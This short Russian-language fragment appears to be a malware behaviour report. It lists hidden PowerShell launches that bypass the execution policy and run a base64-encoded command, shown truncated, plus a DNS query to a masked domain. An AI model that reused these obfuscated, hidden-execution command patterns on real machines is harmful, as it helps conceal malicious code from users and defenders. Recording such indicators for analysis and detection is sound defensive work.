Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy bypass -WindowStyle Hidden -noprofile -e JABaAGkAagBvAEEAdgBrAGEAPQAnAEMAUwBtAGwASgBPADkAOQAnADsAJABkAGYATgBzAFIAcAAgAD0AIAAnADIAMAAnADsAJAB3AGIAOQA3ADUAQQA9ACcAegBBAFYATwBrADM...
- DNS ASK m5####0234shawn.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy bypass -WindowStyle Hidden -noprofile -e JABaAGkAagBvAEEAdgBrAGEAPQAnAEMAUwBtAGwASgBPADkAOQAnADsAJABkAGYATgBzAFIAcAAgAD0AIAAnADIAMAAnADsAJAB3AGIAOQA3ADUAQQA9ACcAegBBAFYATwBrADM...' (со скрытым окном)